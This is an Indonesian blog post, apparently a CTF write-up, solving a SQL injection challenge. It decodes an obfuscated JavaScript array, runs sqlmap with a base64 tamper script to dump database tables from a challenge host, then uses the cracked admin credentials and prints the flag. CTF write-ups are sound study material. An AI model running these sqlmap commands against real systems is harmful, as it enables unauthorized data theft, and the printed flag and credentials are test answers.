Tuesday, July 24, 2018

SQLI Capture Amerika Serikat (Lorem Ipsum) Writeup B2P


SQLI Capture Amerika Serikat (Lorem Ipsum)

Summary:
Di dapati sebuah web yang terlihat hanya web biasa, hanya terdapat data dummies yaitu lorem ipsum,

Solved:
Dengan CTRL + U kemudian saya fokus ke 
Variabel _0x9b7e
Var_0x9b7e=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x63\x68\x61\x72\x41\x74","\x5F\x6B\x65\x79\x53\x74\x72","\x6C\x65\x6E\x67\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6E","\x64\x61\x74\x61\x2E\x70\x68\x70","\x68\x74\x6D\x6C","\x23\x6E\x65\x77\x73\x5F\x69\x64","\x63\x6C\x69\x63\x6B","\x69\x64","\x61\x74\x74\x72","\x65\x6E\x63\x6F\x64\x65","\x23\x6E\x65\x77\x73\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x70\x6F\x73\x74","\x6F\x6E","\x61","\x67\x65\x74","\x72\x65\x61\x64\x79"]
Kemudian saya mencoba untuk mendecode ke Hexa dengan menggunakan Hackbar Modif Hex to Char

Dan menghasilkan 
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + / = charCodeAtcharAt_keyStrlengthreplaceindexOffromCharCoden data.php html #news_id clickidattrencode#news_contentpostonagetready
Saya terfokus pada news_id sama data.php Kemudian saya menggunakan SQLmap untuk melakukan SQLinjection dibagian data.php dan dikarenakan random huruf Abjad dan Angka, ada charCodeAtcharAt_keyStrlengthreplaceindexOffromCharCoden saya berfikir biasanya  SQL Injection itu ada yang base-64 sehingga saya mencoba dengan 
saya mencoba untuk melihat di burp suite dan saya klik salah satunya saya mendapatkan sedikut cule yaitu terdapat ID yang menggunakan nilai sebagai base64

kemudian saya mencoba melakukan teknik blind sql injection dengan menggunakan SQLmap
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs –random-agent
dan hasilnya adalah sebagai berikut

dan benar saja Vuln SQL injetion kemudian saya melakukan SQL injection untuk mencari nama databasenya di ada dengan Bruteforce punya SQLmap kemudian saya mencari table yang ada di dalam database tersebut 
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent --tables 
dan di dapat 3 table dengan nama sebagai berikut 
kemudian saya mencoba untuk dump di bagian config dengan menggunakan 
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent -T config –dump
dan hasilnya sebagai berikut 

dan ternya itu menyiman url dari adminya yaitu /1n1admbr0
kemudian saya dump data tabel n1mbusadmin dengan menggunakan seperti di bawah ini 
python sqlmap.py  -u "http://35.187.236.126:8013/data.php" --data="id=1" --tamper=base64encode --dbs --random-agent -T n1mbusadmin –dump


kemudian saya mendapatkan hasil setelah brutefoce password menggunakan wolrdlist dari SQLmap sendiri dan saya mendapatkan sebagai berikut

Kemudian saya mencoba membuka url tersebut di http://35.187.236.126:8013/1n1admbr0/
dan saya masukan user backupuser dan password linkinpark kemudian saya login dan mendownload flag tersebut
kemudian saya download flag tersebut dan mendapatakan flag tersebut
setelah saya download kemudian saya mendapatkan flag tersebut flag tersebut adalah

dan Flagnya adalah 
B2P{af39e6e718f3fb8f2de9ae9e6464b150}

No comments:

Post a Comment